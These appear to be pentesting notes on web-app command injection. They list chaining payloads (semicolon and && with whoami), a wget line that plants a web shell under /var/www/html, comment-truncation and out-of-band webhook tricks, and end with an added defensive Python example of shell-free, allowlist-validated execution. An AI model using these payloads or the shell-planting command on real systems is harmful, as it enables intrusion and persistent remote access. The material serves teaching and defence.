Command Injection
When a web app takes input from a user and executes a command on the host, this can be exploited to run arbitrary commands unless the input is properly sanitized and protected.
When attempting command injection, we need to think about how the command is being run. We can possibly chain commands with the ; or && operators:
; whoami;
&& whoami;
&& wget [shell file] > /var/www/html/shell.php;
# A hash can sometimes clear out commands after the injection
123)^2))}';whoami;#
Viewing source can sometimes provide a better format than what may be output for you
Use this to find out what is available to you for creating a reverse shell
Out of Bounds Technique
This is when we need to send information to another area, such as adding a command in backticks to a webhook URL and reviewing the data after it runs. We can sometimes use things like a newline separator (\n) to run these commands as well.
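For the defending side, an added example (not part of the original notes) showing the handler pattern that lets the separators above work, next to a hardened form that validates the input and runs the command without a shell. The `ping` command string, the function names and the echoing child process are assumptions made for illustration.

```python
import ipaddress
import subprocess
import sys

# Constructed inputs: one legitimate value, then the chaining forms from this page.
SAMPLES = ["192.0.2.10", "; whoami;", "&& whoami;", "`whoami`", "192.0.2.10\nwhoami"]

# Assumption: a harmless stand-in for the real tool (e.g. ping) that only
# writes back the single argument it received.
CHILD = [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])"]


def vulnerable_command(host):
    """'Before' pattern: input concatenated into a string handed to a shell.
    The string is only returned here, never executed."""
    return "ping -c 1 " + host


def validate_host(host):
    """Allowlist check: accept a literal IP address and nothing else."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        return None


def run_as_argument(value):
    """Pass the value as one argv element with no shell involved, so
    ; && backticks and newlines reach the child as plain characters."""
    done = subprocess.run(CHILD + [value], capture_output=True,
                          text=True, timeout=10, check=True)
    return done.stdout


def handle_request(host):
    """Hardened handler: validate first, then run without a shell."""
    checked = validate_host(host)
    if checked is None:
        return None  # reject instead of trying to strip bad characters
    return run_as_argument(checked)


if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(vulnerable_command(sample)), "->", repr(handle_request(sample)))
```

Rejecting anything that fails the allowlist is more reliable than stripping separators, because the blocklist has to cover every shell metacharacter while the allowlist only has to describe valid input.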